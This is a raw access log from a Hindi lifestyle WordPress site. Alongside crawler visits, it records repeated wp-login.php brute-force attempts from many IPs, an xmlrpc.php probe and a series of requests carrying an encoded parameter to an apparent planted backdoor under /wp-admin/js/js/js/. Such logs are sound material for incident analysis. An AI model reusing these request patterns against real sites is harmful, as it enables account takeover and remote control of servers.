File: /home/blushinc/access-logs/hindi.blushin.com-ssl_log
199.188.200.151 - - [20/Oct/2025:08:08:05 -0400] "POST /wp-login.php HTTP/2.0" 200 7088 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.4.29.155 - - [20/Oct/2025:08:08:09 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.4.29.155 - - [20/Oct/2025:08:08:09 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
54.37.96.153 - - [20/Oct/2025:08:08:10 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
54.37.96.153 - - [20/Oct/2025:08:08:11 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.29.132.72 - - [20/Oct/2025:08:08:13 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.67 - - [20/Oct/2025:08:08:11 -0400] "GET /43828260?entity=0043768362 HTTP/2.0" 200 192438 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.29.132.72 - - [20/Oct/2025:08:08:15 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:05:50 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353535302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936313935302q6138393830396530373437366439396133646263656665363966623236656462222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
68.65.123.34 - - [20/Oct/2025:08:08:20 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:08:21 -0400] "GET /tag/milk-powder-barfi-recipe-in-hindi/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
68.65.123.34 - - [20/Oct/2025:08:08:22 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:08:22 -0400] "GET /tag/milk-powder-barfi-recipe-in-hindi/feed/ HTTP/2.0" 200 9477 "https://hindi.blushin.com/tag/milk-powder-barfi-recipe-in-hindi/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
50.21.186.206 - - [20/Oct/2025:08:08:24 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.21.186.206 - - [20/Oct/2025:08:08:27 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.249.40.156 - - [20/Oct/2025:08:08:31 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.249.40.156 - - [20/Oct/2025:08:08:34 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:06:12 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353537322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936313937322q3938313137323961613735343632636136356636303063303163376634343939222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
85.208.96.202 - - [20/Oct/2025:08:08:43 -0400] "GET /tag/coconut-milk-to-get-straight-hair-in-hindi/ HTTP/2.0" 200 149740 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:08:45 -0400] "GET /tag/top-10-makeup-mistakes HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:08:46 -0400] "GET /tag/top-10-makeup-mistakes/ HTTP/2.0" 200 149814 "https://hindi.blushin.com/tag/top-10-makeup-mistakes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:08:57 -0400] "GET /tag/seasme-seeds-benefits-for-health/ HTTP/2.0" 200 149830 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
40.77.167.254 - - [20/Oct/2025:08:08:58 -0400] "GET /wash-the-clothes-mixing-salt-in-washing-powder-to-make-them-shinier.html/washing-tips8 HTTP/2.0" 200 194156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
2a03:2880:f800:34:: - - [20/Oct/2025:08:08:59 -0400] "GET /tag/indian-home-remedies-for-kidney-stones/ HTTP/2.0" 200 149638 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.143 - - [20/Oct/2025:08:09:00 -0400] "GET /tag/costume-jewelry-care/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:06:35 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353539352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936313939352q3036623534646631353535343562386438666139313633623533396266326230222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
185.191.171.14 - - [20/Oct/2025:08:09:00 -0400] "GET /tag/must-have-essential-oils-for-winter/ HTTP/2.0" 200 149892 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:09:01 -0400] "GET /tag/costume-jewelry-care/feed/ HTTP/2.0" 200 12104 "https://hindi.blushin.com/tag/costume-jewelry-care/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
2a03:2880:f800:2:: - - [20/Oct/2025:08:09:01 -0400] "GET /how-to-remove-the-stains-on-your-woolen-clothes/ HTTP/2.0" 200 312113 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.73.67 - - [20/Oct/2025:08:09:05 -0400] "GET /1590450597?entity=1588251526 HTTP/2.0" 200 192530 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.68 - - [20/Oct/2025:08:09:11 -0400] "GET /43832634?entity=0043772730 HTTP/2.0" 200 194549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:09:21 -0400] "GET /tag/recipe-of-amritsari-chole-bhature-in-hindi HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.9 - - [20/Oct/2025:08:09:21 -0400] "GET /tag/easy-achari-masala-recipe/ HTTP/2.0" 200 149433 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:08:06:57 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353631372p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323031372q3863333765643038306266613933303561353062373561636139323634666239222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:08:09:22 -0400] "GET /tag/recipe-of-amritsari-chole-bhature-in-hindi/ HTTP/2.0" 200 149760 "https://hindi.blushin.com/tag/recipe-of-amritsari-chole-bhature-in-hindi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
199.188.201.233 - - [20/Oct/2025:08:09:26 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
199.188.201.233 - - [20/Oct/2025:08:09:26 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
75.119.147.14 - - [20/Oct/2025:08:09:29 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.197 - - [20/Oct/2025:08:09:29 -0400] "GET /tag/common-mistakes-women-make-when-buying-a-bra/ HTTP/2.0" 200 149620 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
75.119.147.14 - - [20/Oct/2025:08:09:30 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:07:19 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353633392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323033392q3164363232643763303035366662656232633362306662666338333430303536222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
89.117.74.114 - - [20/Oct/2025:08:09:45 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MAMD; rv:11.0) like Gecko"
85.208.96.211 - - [20/Oct/2025:08:09:45 -0400] "GET /tag/sonakshi-sinhas-weight-loss/ HTTP/2.0" 200 149716 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
159.65.61.232 - - [20/Oct/2025:08:09:48 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:09:47 -0400] "GET /tag/coconut-oil-for-face-benefits/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:09:48 -0400] "GET /tag/coconut-oil-for-face-benefits/feed/ HTTP/2.0" 200 30973 "https://hindi.blushin.com/tag/coconut-oil-for-face-benefits/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
159.65.61.232 - - [20/Oct/2025:08:09:50 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
205.196.221.238 - - [20/Oct/2025:08:10:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
205.196.221.238 - - [20/Oct/2025:08:10:02 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
162.0.232.187 - - [20/Oct/2025:08:10:04 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
162.0.232.187 - - [20/Oct/2025:08:10:05 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
213.175.211.175 - - [20/Oct/2025:08:10:05 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
185.191.171.10 - - [20/Oct/2025:08:10:04 -0400] "GET /tag/lal-kitab-remedies-for-job/ HTTP/2.0" 200 152373 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:08:07:41 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353636312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323036312q6135366335313635363731363135363938623637623432623166383332326533222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
66.29.132.218 - - [20/Oct/2025:08:10:08 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.29.132.218 - - [20/Oct/2025:08:10:09 -0400] "POST /wp-login.php HTTP/2.0" 200 - "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
213.175.211.175 - - [20/Oct/2025:08:10:10 -0400] "POST /wp-login.php HTTP/2.0" 200 7145 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
198.71.52.204 - - [20/Oct/2025:08:10:12 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.71.52.204 - - [20/Oct/2025:08:10:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
202.131.96.220 - - [20/Oct/2025:08:10:16 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
202.131.96.220 - - [20/Oct/2025:08:10:17 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:08:10:20 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:08:10:21 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:08:03 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353638332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323038332q6432646331623533646566616534306235663632393234656338383064623533222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
57.130.20.252 - - [20/Oct/2025:08:10:30 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.67 - - [20/Oct/2025:08:10:29 -0400] "GET /43833285?entity=0043773382 HTTP/2.0" 200 190815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.130.20.252 - - [20/Oct/2025:08:10:31 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.32.113.195 - - [20/Oct/2025:08:10:34 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.32.113.195 - - [20/Oct/2025:08:10:35 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.68 - - [20/Oct/2025:08:10:34 -0400] "GET /43818569?entity=0043758686 HTTP/2.0" 200 196650 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.162.166.162 - - [20/Oct/2025:08:10:39 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
203.162.166.162 - - [20/Oct/2025:08:10:39 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:08:25 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353730352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323130352q3636393631613633623835653562643765383330333262346335383532653630222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
66.249.73.67 - - [20/Oct/2025:08:10:58 -0400] "GET /43822943?entity=0043763054 HTTP/2.0" 200 198717 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.32.113.195 - - [20/Oct/2025:08:11:07 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.32.113.195 - - [20/Oct/2025:08:11:08 -0400] "POST /wp-login.php HTTP/2.0" 200 7092 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.101.0.130 - - [20/Oct/2025:08:11:16 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:11:17 -0400] "GET /robots.txt HTTP/2.0" 200 82 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
46.101.0.130 - - [20/Oct/2025:08:11:17 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:08:52 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353733322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323133322q3261663735616632353737643738326430336665396564646139613730393362222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
64.227.176.68 - - [20/Oct/2025:08:10:52 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:11:18 -0400] "GET /tag/cucumber-lemon-mint-ginger-water-weight-loss-reviews/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
64.227.176.68 - - [20/Oct/2025:08:11:19 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
64.227.176.68 - - [20/Oct/2025:08:11:20 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:11:19 -0400] "GET /tag/cucumber-lemon-mint-ginger-water-weight-loss-reviews/feed/ HTTP/2.0" 200 9349 "https://hindi.blushin.com/tag/cucumber-lemon-mint-ginger-water-weight-loss-reviews/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
64.227.176.68 - - [20/Oct/2025:08:11:21 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.101.0.130 - - [20/Oct/2025:08:11:22 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.101.0.130 - - [20/Oct/2025:08:11:23 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.153.42.48 - - [20/Oct/2025:08:11:26 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:27 -0400] "GET /how-to-save-your-broken-relationship/ HTTP/2.0" 200 316960 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=492e3cf54bd42df3b24a3de8e2307cafx HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/themes/Newspaper/style.css?ver=12.7.1 HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
